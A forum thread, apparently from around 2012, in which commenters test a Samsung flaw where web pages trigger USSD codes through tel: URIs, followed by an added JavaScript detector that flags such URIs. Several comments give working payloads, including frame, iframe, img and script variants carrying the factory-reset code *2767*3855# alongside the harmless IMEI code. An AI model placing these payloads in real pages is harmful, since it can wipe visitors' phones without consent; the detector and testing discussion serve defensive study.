
I deployed this code on this page:

http://flasharabia.com

However, the code doesn't seem to work...



Seriously? You're posting the DESTRUCTIVE version of the exploit instead of a safe test version? Shame on you.


If you want to check the functionality - it would be far more responsible to use a non-destructive USSD code.

e.g. *#06# displays the phone's IMEI number


Testing this myself, any USSD code that begins with * # launches the device's dialler with no characters dialled. Looking at the list of codes: http://umitem.blogspot.com.au/2010/10/samsung-galaxy-s-i9000...

The factory reset appears to be the only USSD "auto dialled" code that doesn't begin with *#. Which is rather unfortunate.

Edit: Actually, the IMEI code works on the Galaxy S2 running 2.3 (just tested) but not the Galaxy S3 running 4.0. My above comment refers to the S3.


You need to replace # with %23


I did replace the # with %23 in my testing, it works on the S2 but not the S3. You can view for yourself at: http://kristofferr.com/samsung.html


Seconded. This works beautifully as proof-of-concept against my S2 and a colleague's random HTC phone.

    <!DOCTYPE html>
    <html>
    <frameset>
        <frame src="tel:*%2306%23" />
    </frameset>
    </html>


How about you use proper HTML instead of just the frame code and nothing else?

e.g.

    <!DOCTYPE html>
    <html>
    <frameset>
        <frame src="tel:*2767*3855%23">
    </frameset>
    </html>


Also, it will be interesting to check other ways: <iframe src="tel:27673855%23">, <img src="tel:27673855%23">, <script type="text/javascript">location.href="tel:27673855%23";</script> and so on.


iFrame works, direct link too. I tested also things like URL encoding via # = %23, * = %2A etc. - but does not really matter, the target is the dialer, not the browser.

http://pastebin.com/cGgs7T4h << some thoughts


Yes, it works now; however, you need to press the call button to initiate the format.
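
Added example, not part of the thread and not code from any commenter: a JavaScript check that a content filter or page reviewer could run over markup to flag tel: URIs carrying * or #, literal or percent-encoded, in the frame, iframe, img, link and script contexts discussed above. The function names and the sample markup are constructed for illustration, and the sample uses only the IMEI display code *#06# mentioned earlier in the thread.

```javascript
// Added example: flag tel: URIs that carry a USSD/MMI string (* or #),
// literal or percent-encoded. Names and SAMPLE markup are constructed.

// Tags from the thread whose src/href can hold a tel: URI.
const URL_ATTR = /<(frame|iframe|img|a)\b[^>]*?\b(?:src|href)\s*=\s*["']?\s*(tel:[^"'\s>]*)/gi;
// Script-driven navigation such as location.href="tel:...".
const SCRIPT_NAV = /location(?:\.href)?\s*=\s*["'](tel:[^"']*)["']/gi;

// Decode %23, %2A and similar so encoded and literal forms compare equal.
function normalizeTel(uri) {
  const body = uri.slice(4); // drop the "tel:" scheme
  try { return decodeURIComponent(body); } catch (e) { return body; }
}

// Ordinary numbers use digits, +, - and spaces; * or # marks an MMI/USSD string.
function isUssdLike(number) { return /[*#]/.test(number); }

function findUssdTelUris(html) {
  const findings = [];
  for (const m of html.matchAll(URL_ATTR)) {
    const context = m[1].toLowerCase();
    const number = normalizeTel(m[2]);
    // A link needs a tap; frame, iframe and img load without one.
    if (isUssdLike(number)) findings.push({ context, number, autoLoad: context !== 'a' });
  }
  for (const m of html.matchAll(SCRIPT_NAV)) {
    const number = normalizeTel(m[1]);
    if (isUssdLike(number)) findings.push({ context: 'script', number, autoLoad: true });
  }
  return findings;
}

// Constructed sample page using only the IMEI display code *#06#.
const SAMPLE = [
  '<frameset><frame src="tel:*%2306%23" /></frameset>',
  '<img src="tel:%2A%2306%23">',
  '<a href="tel:+15555550100">call us</a>',
  '<script>location.href="tel:*%2306%23";</script>',
].join('\n');

console.log(findUssdTelUris(SAMPLE));
```

This is a pattern scan over raw markup, so a tel: URI assembled at runtime by script needs a DOM-level check instead.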



